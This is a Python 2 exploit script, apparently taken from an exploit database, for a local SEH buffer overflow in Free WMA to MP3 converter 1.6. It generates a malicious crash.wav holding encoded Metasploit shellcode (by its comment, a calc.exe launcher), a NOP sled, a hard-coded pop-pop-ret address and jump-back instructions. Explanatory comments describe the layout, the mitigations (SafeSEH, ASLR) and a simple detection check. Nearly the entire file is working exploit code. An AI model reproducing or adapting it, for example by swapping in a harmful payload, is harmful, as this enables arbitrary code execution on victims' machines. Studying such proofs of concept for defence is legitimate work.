#!/usr/bin/python -w
# In the name of allah
# Title : Local buffer overflow - SEH
# Infected program: [Free WMA to MP3 converter 1.6]
# Date: 30/11/2012
# Exploit Author: [R3ZN0V]
# Software : [www.eusing.com]
# Download Link: [http://www.eusing.com/free_wma_converter/mp3_wma_converter.htm]
# OS's: [Windows xp sp3 , Windows 7 64bit sp1 and 32bit]
# References : http://www.1337day.com/exploit/17433
#=====================================================================================#
# First , i'd like to thank b33f for all his cooperation (always the best man ;) ) . #
# i suffered soo much until i made this a work exploit ,as well a few problems with  #
# badchars analyzing and executing my shellcode , which is inside the memory after   #
# tracing badchars , if you looked deeply at the path you'll see a weird thing       #
# is a two byte of 0D will be added automatically like this :                        #
# 09 (0D) 0A 0B 0C (0D) , i've no idea what caused that,first 0D is the problem      #
# Probably like null-byte , however , go to metasploit and figure this out by badchars#
# analyzing , and see try to replace shell to another one using this command :       #
# msfencode -b '\x00\x0a' , obviously it won't work .                                #
#=====================================================================================#
"""Proof-of-concept file generator for the SEH overflow described in the header.

What the script does (everything stated here is visible in the code below):

* Assembles ``buffer`` and writes it to ``crash.wav`` in the current working
  directory, then prints one confirmation line. No other side effects.
* ``buffer`` is not a RIFF/WAVE file. It begins with 11 ``0x90`` bytes and the
  227-byte ``shell`` blob, is padded with ``0x41`` up to offset 4116, and is
  followed by ``junk1`` (4 bytes), ``junk2`` (4 bytes), ``junk3`` (5 bytes) and
  50 ``'C'`` bytes - 4179 bytes as assembled in memory.
* ``junk2`` is a hard-coded address. The author's own comment says it lives in
  a module with no rebasing, no ASLR and no SafeSEH, so the technique only
  works while that module loads unchanged at that address. Linking modules
  with /SAFESEH and /DYNAMICBASE removes the fixed target this relies on.
* Detection/triage: a ``.wav`` whose first bytes are a ``0x90`` run instead of
  ``RIFF``, and whose body is a multi-kilobyte run of a single repeated byte,
  is trivially distinguishable from real audio - a cheap sanity check before
  any parser touches the content.

Python 2 only: the closing ``print`` is a statement, and ``file`` (a Python 2
builtin) is shadowed by the output filename.
"""
file = "crash.wav"  # relative path: the file lands in the current working directory
# windows/exec CMD=calc.exe EXITFUNC=seh R | msfencode -e x86/shikata_ga_nai -b '\x00\x0a\x0d' -t c <========= 227 byte iteration=1 =========>
# Opaque encoded blob (15 strings of 15 bytes + 2 = 227 bytes). What it does at
# runtime is asserted only by the msfencode comment above, not by anything here.
shell = ("\xda\xc6\xd9\x74\x24\xf4\x5f\xb8\xc2\x0f\x5e\x65\x33\xc9\xb1"
         "\x33\x31\x47\x17\x83\xc7\x04\x03\x85\x1c\xbc\x90\xf5\xcb\xc9"
         "\x5b\x05\x0c\xaa\xd2\xe0\x3d\xf8\x81\x61\x6f\xcc\xc2\x27\x9c"
         "\xa7\x87\xd3\x17\xc5\x0f\xd4\x90\x60\x76\xdb\x21\x45\xb6\xb7"
         "\xe2\xc7\x4a\xc5\x36\x28\x72\x06\x4b\x29\xb3\x7a\xa4\x7b\x6c"
         "\xf1\x17\x6c\x19\x47\xa4\x8d\xcd\xcc\x94\xf5\x68\x12\x60\x4c"
         "\x72\x42\xd9\xdb\x3c\x7a\x51\x83\x9c\x7b\xb6\xd7\xe1\x32\xb3"
         "\x2c\x91\xc5\x15\x7d\x5a\xf4\x59\xd2\x65\x39\x54\x2a\xa1\xfd"
         "\x87\x59\xd9\xfe\x3a\x5a\x1a\x7d\xe1\xef\xbf\x25\x62\x57\x64"
         "\xd4\xa7\x0e\xef\xda\x0c\x44\xb7\xfe\x93\x89\xc3\xfa\x18\x2c"
         "\x04\x8b\x5b\x0b\x80\xd0\x38\x32\x91\xbc\xef\x4b\xc1\x18\x4f"
         "\xee\x89\x8a\x84\x88\xd3\xc0\x5b\x18\x6e\xad\x5c\x22\x71\x9d"
         "\x34\x13\xfa\x72\x42\xac\x29\x37\xb2\x5d\xe0\xad\x23\xc4\x91"
         "\x8c\x29\xf7\x4f\xd2\x57\x74\x7a\xaa\xa3\x64\x0f\xaf\xe8\x22"
         "\xe3\xdd\x61\xc7\x03\x72\x81\xc2\x67\x15\x11\x8e\x49\xb0\x91"
         "\x35\x96")
# 11 + 227 = 238 bytes; the 0x90 run is the very first thing in the output file.
evil = "\x90" * 11 + shell # don't shrink these nops or the exploit wouldn't work , just in case if you replaced the shellcode
junk1 = "\xEB\x06\x90\x90" # jmp 4 byte to far jmp
# Fixed address (see the docstring): the author notes the module it points into
# has rebase=false, aslr=false and no SafeSEH - the precondition for this PoC.
junk2 = "\x56\x23\x40\x00" # pop pop retn Wmpcon.exe Rebase=false , aslr=false , seh=unsafe os=false
junk3 = "\xE9\xEA\xEF\xFF\xFF" # jmp back 4108 byte to the beggining of our buffer
junk4 = "C"*50
# Layout: [evil][0x41 padding to 4116 bytes][junk1 4][junk2 4][junk3 5][junk4 50]
buffer = evil + "\x41"*(4116-len(evil)) + junk1 + junk2 + junk3 + junk4
# Single write of the assembled buffer, then close. No header of any kind is
# prepended, so the result is not a parseable RIFF/WAVE file.
text = open(file, "w")
text.write(buffer)
text.close()
print "\t\n The file has been created :) "